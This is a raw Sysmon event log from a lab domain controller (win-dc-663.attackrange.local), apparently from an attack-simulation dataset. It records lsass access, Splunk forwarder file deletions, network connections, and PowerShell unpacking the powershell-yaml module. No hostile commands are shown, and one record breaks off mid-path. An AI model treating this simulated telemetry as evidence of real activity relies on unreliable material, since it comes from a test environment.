10341000x800000000000000024198Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:00.458{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-9DD8-60D3-0100-00000000CF01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x800000000000000024197Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:00.067{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2650735853112FDED9CD3CA44AC6AA00,SHA256=D8A34508A10FDF92B82F5160AC5FCA911083C92216E6797947D305376B7EA96F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024212Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:01.665{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7BDFB5849DC78E49E46F42245676D3D7,SHA256=CF6438C81403B6084E6BDB6FB6265A151C41A36F2C810E0EEFD4EC417378F5CA,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024211Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:00.512{4DB9351A-9DD8-60D3-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61486-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local445microsoft-ds 354300x800000000000000024210Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:00.512{4DB9351A-9DD8-60D3-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61486-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local445microsoft-ds 354300x800000000000000024209Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:00.493{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61485-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local49666- 354300x800000000000000024208Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:00.493{4DB9351A-9DDD-60D3-1400-00000000CF01}1056C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61485-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local49666- 354300x800000000000000024207Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:00.489{4DB9351A-9DDD-60D3-0D00-00000000CF01}904C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 
SERVICEtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61484-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local135epmap 354300x800000000000000024206Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:00.489{4DB9351A-9DDD-60D3-1400-00000000CF01}1056C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61484-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local135epmap 354300x800000000000000024205Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:00.389{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local61483-true2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local389ldap 354300x800000000000000024204Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:00.389{4DB9351A-9DDE-60D3-1600-00000000CF01}1292C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetrue2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local61483-true2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local389ldap 354300x800000000000000024203Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:00.379{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61482-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local389ldap 354300x800000000000000024202Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:00.379{4DB9351A-9DDE-60D3-1600-00000000CF01}1292C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61482-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local389ldap 
23542300x800000000000000024201Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:01.087{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=969E73F4C43F378556B43E0A99A3D93D,SHA256=D3CF26B910C7560736F3C0B015898546B5F8A356F98B385184AF1FD7AF6DF783,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000024214Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:00.495{4DB9351A-9DDD-60D3-1400-00000000CF01}1056win-dc-663.attackrange.local0fe80::fdd4:2588:4c96:4409;fe80::18c1:3b8f:f5ff:fef1;2001:0:34f1:8072:18c1:3b8f:f5ff:fef1;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 23542300x800000000000000024213Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:02.102{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B28DBC41BFF8C627A6EA6B2600B8E4EA,SHA256=56445A3F47CF7D02689A54ED44F1E1C3DF14A62B597E143704E0092026B222FD,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024216Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:01.142{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61487-false10.0.1.12-8000- 23542300x800000000000000024215Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:03.102{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
21:08:12.591{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\lib\net35\LICENSEMD5=25C40CB4C538F431332DE58473C0427A,SHA256=501450819EE316F35A214E7CEC1C19E14E5126392D356069D7AFEC7E59699536,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024260Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.575{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1.nupkgMD5=E6C0341FC9AEB84E1E36BFECABBEAD48,SHA256=47F21C151775C2F0D8A21C86CEDCA3998F0BBCFD309B27977C9024F48DA9787C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024259Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.544{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\powershell-yaml.nuspecMD5=AB1BDE82E3EA01840461F8CDECAF9ECE,SHA256=42ACB556A89758ABCD45DDEF1BE634BBA426CA10AA609AE4138B4A864841D24E,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024258Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.528{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\Tests\powershell-yaml.Tests.ps12021-06-23 21:08:12.528 11241100x800000000000000024257Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:12.528{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\lib\netstandard1.3\YamlDotNet.dll2021-06-23 21:08:12.528 
11241100x800000000000000024256Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:12.528{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\lib\net45\YamlDotNet.dll2021-06-23 21:08:12.528 11241100x800000000000000024255Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:12.512{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\lib\net35\YamlDotNet.dll2021-06-23 21:08:12.512 11241100x800000000000000024254Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.512{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\Load-Assemblies.ps12021-06-23 21:08:12.512 23542300x800000000000000024253Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.497{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\package\services\metadata\core-properties\430f5a5dfccc46539418c7fe3ab7fdb5.psmdcpMD5=DC0292F774DABDDCBCDB307084C1332A,SHA256=C0F1A7DA750EACCACB94DAFE3365110F24FD1B860EAC139A9DA5C83B323C94FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024252Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:08:12.497{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\[Content_Types].xmlMD5=7C8D4574D5E9D74914A8AD0E4404FE3C,SHA256=6193BFA873134B31C4ED28AE5B3B724391D73617CB09B6D74C9CCAF3B380503B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024251Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.497{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\_rels\.relsMD5=63100F6CD3B03BD5E29EC81E0445C238,SHA256=807430E09941CFA610F0F771DEE3B34BE19BAC29878727F745D501B7765ACC7E,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024250Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:12.481{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\lib\net45\YamlDotNet.dll2021-06-23 21:08:12.481 11241100x800000000000000024249Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:12.481{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\lib\netstandard1.3\YamlDotNet.dll2021-06-23 21:08:12.481 11241100x800000000000000024248Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:12.466{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\lib\net35\YamlDotNet.dll2021-06-23 21:08:12.466 11241100x800000000000000024247Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:08:12.466{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\Tests\powershell-yaml.Tests.ps12021-06-23 21:08:12.466 11241100x800000000000000024246Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.466{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\Load-Assemblies.ps12021-06-23 21:08:12.466 23542300x800000000000000024245Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.278{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=655FA373C3B9A443BC2DA98D44775874,SHA256=8F159AF1E49936BA6341692CABE08B36C365435499D56574739A3A3CAD60C297,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024244Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.278{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CC4E26C0180830172FC7B567401040F1,SHA256=8EBEDB13ECF0C410437620BFEE351486BDFCDBA78A7BBB83860816614EABFDB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024243Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.216{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B69A03DA550CFBA41D4611945C92315,SHA256=07976E4D761867D581B32E4E5862D506A9D2140921E5D82D4D94DB4136892150,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024339Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.266{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61500-false72.21.81.200-443https 354300x800000000000000024338Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.255{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local57913- 354300x800000000000000024337Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.114{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61499-false10.0.1.12-8000- 354300x800000000000000024336Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:11.767{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61498-false168.61.186.235-443https 354300x800000000000000024335Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:11.361{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61497-false168.61.186.235-443https 
23542300x800000000000000024334Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.716{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A777541E62002E5B974188038AE3485B,SHA256=DAE235A0C8520FAC3F340664327322839131F36BBB68345AF36736E72170E1B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024333Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.356{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=837E8A6C0F9E1A3E9F181E22A5C914E9,SHA256=A15E19BB7107EF054C3678A94D6F84F655DC4B95E13602D5F46E15BE8D85841F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024332Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.341{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AA1E958CF5464A9F48F400A5E8DA7C5,SHA256=E1B84BD74ADF63BB0BCE74BAC609C04B3AF395C1D9DE1A5606C15D41FAE1C001,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024331Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.325{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=912B883CD0C45DAF1FC41E9FB4AC8C01,SHA256=303B1C3EC5F1955A7BE2720CEBB01E6D62C9F3177910B75F109BE728865B531F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024330Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.325{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0022FA0EFE1F9B7B92C27C4B6EC5BC0,SHA256=156ACB00D628BC9E4E479B626DFED44B03BBE921520F1B21A29629BFEB625339,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024329Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.184{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\README.mdMD5=2BE6396AEBA655CD9EDD9AAA5578F149,SHA256=DF954FA2D7BFA9E029FF717A7AADD5A121649B24255B2324C1AFA5D9FF6CA8FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024328Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.184{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\powershell-yaml.psm1MD5=5F146B18BB809E5D900403AB0066D3E3,SHA256=A7D42EDEA0BD36817C750C5EA6D550274A877094C3CF0C620DFE887F8D41AFEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024327Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:08:13.184{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\powershell-yaml.psd1MD5=9BFC87E3A2D4C1B72B26A975E89A0253,SHA256=D6F3DF338AB1A2701E456EA412A28A5981A53C490E19F1CE37FBA466812088DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024326Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.184{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\Load-Assemblies.ps1MD5=5BC56753AE039CB4E6DB7D2B573D8310,SHA256=2163CEA74A5F2D9023C3343CCCC3FAF0996B72850C7A8F2E0735F707B44EE3AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024325Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.184{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\LICENSEMD5=07FFE4BACD78A3E084BD25BAFB532A71,SHA256=F9B5ED99A83F2546D2696763210BAEEE4A8F476A9BE8E69F8C32D9BD9D9516C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024324Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.184{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\Tests\powershell-yaml.Tests.ps1MD5=83E9E0680C2DCA11951CE71B71C85B06,SHA256=5D615B9C64F422D66D98C8E54DF43CC08EB1603399EC71CF661F6FA08D0A18DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024323Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:08:13.184{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\lib\netstandard1.3\YamlDotNet.xmlMD5=6FC1D7DCC2B91B4492FC2624927F2C0B,SHA256=E946653D61961FC79F3B970D7996B8F5A5566202148B8A5508B3608D602510E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024322Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.184{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\lib\netstandard1.3\YamlDotNet.dllMD5=C6D295EC641BC776633AB4EDE6EEE871,SHA256=342E5362EE18BBCC1640B31F9F7040A1BDCF53C865E0976F99C4247C0F022B87,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000024321Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.184{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\lib\netstandard1.3\LICENSE-libyamlMD5=6015F088759B10E0BC2BF64898D4AE17,SHA256=D0D8B09800A45CD982E9568FC7669D9C1A4C330E275A821BBE24D54366D16FE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024320Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.184{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\lib\netstandard1.3\LICENSEMD5=25C40CB4C538F431332DE58473C0427A,SHA256=501450819EE316F35A214E7CEC1C19E14E5126392D356069D7AFEC7E59699536,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000024319Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.184{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\lib\net45\YamlDotNet.xmlMD5=1045C5CAD5567179C0C91E47C43689E5,SHA256=6C9A38C755046212D995C94D912F1CC27E35A44B0B555F813D4E4510387D2111,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024318Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.169{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\lib\net45\YamlDotNet.dllMD5=DA2625600648BA915F0B84D077D9674C,SHA256=D6651327108E0FBD0CDC31FED001170044D23F31F5F26708E3EDC6C28B4A8C40,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000024317Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 